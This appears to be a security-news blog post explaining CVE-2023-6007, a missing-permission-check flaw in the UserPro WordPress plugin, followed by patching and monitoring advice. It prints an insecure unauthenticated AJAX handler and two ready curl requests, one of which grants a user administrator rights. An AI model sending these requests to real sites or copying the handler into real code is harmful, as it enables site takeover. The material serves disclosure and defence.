CVE CyberSecurity Database News

CVE-2023-6007 - How Hackers Exploit UserPro WordPress Plugin to Steal, Change, or Delete Your Data

Poster -

If you run a WordPress site, keeping plugins updated and secure is a must. Recently, a major security problem was found in the popular UserPro plugin affecting all versions up to 5.1.1. This flaw, tracked as CVE-2023-6007, lets attackers mess with your user data without even logging in. In this post, we’ll break down the bug in simple language, show you how hackers can exploit it (with code), and how you can protect your website.

What is UserPro and What’s the Problem?

UserPro is a premium WordPress plugin for managing user profiles, social connections, and community features on websites.

The Vulnerability: Missing Capability Checks

The Plugin doesn’t properly check if a user has permission (a “capability check”) before letting them make changes or view sensitive data. Because of this, anyone, even people who aren’t logged in, can:

Change plugin settings

The Wordfence security team discovered that multiple functions were vulnerable, failing to use current_user_can() or other access controls.

How Attackers Exploit CVE-2023-6007

Let’s look at how hackers exploit this—no login needed!

For example, a usual AJAX handler in UserPro could look like this (simplified)

add_action('wp_ajax_nopriv_userpro_update_user_meta', 'userpro_update_user_meta_callback');
function userpro_update_user_meta_callback() {
    $user_id = $_POST['user_id'];
    $meta_key = $_POST['key'];
    $meta_value = $_POST['value'];
    update_user_meta($user_id, $meta_key, $meta_value); // <--- INSECURE!
    wp_send_json_success();
}

Notice: There’s no if(!current_user_can(...)) or nonce check! Anyone can call this endpoint.

Here’s how an attacker tricks your site into updating user meta data

curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php?action=userpro_update_user_meta'; \
     -d 'user_id=2&key=wp_capabilities&value=a:1:{s:13:"administrator";b:1;}'

Attackers can even change plugin options

curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php?action=userpro_save_options'; \
     -d 'option_name=sensitive_option&option_value=hacked'

How to Fix and Protect Yourself

1. Update UserPro IMMEDIATELY
As of the time of writing, the fix is available in UserPro version 5.1.2. Download and apply the update from the official UserPro site.

2. Limit Access to wp-admin/admin-ajax.php
Use a firewall like Wordfence to block suspicious requests to AJAX endpoints.

3. Audit User Accounts
Check if any users had their roles or data changed without your knowledge.

4. Monitor Site for Unusual Activity
Monitor logs for unusual POST requests to /wp-admin/admin-ajax.php.

References & Further Reading

- Wordfence Advisory
- CVE-2023-6007 on CVE.org
- UserPro Official Site

Conclusion

CVE-2023-6007 shows how a single missing permission check in a WordPress plugin can put your entire site at risk—letting attackers steal, change, or delete data at will. Always keep plugins up-to-date, use a web firewall, and audit your site regularly. If you use UserPro, update to v5.1.2 *now*!

Timeline

Published on: 11/22/2023 16:15:15 UTC
Last modified on: 11/29/2023 19:01:54 UTC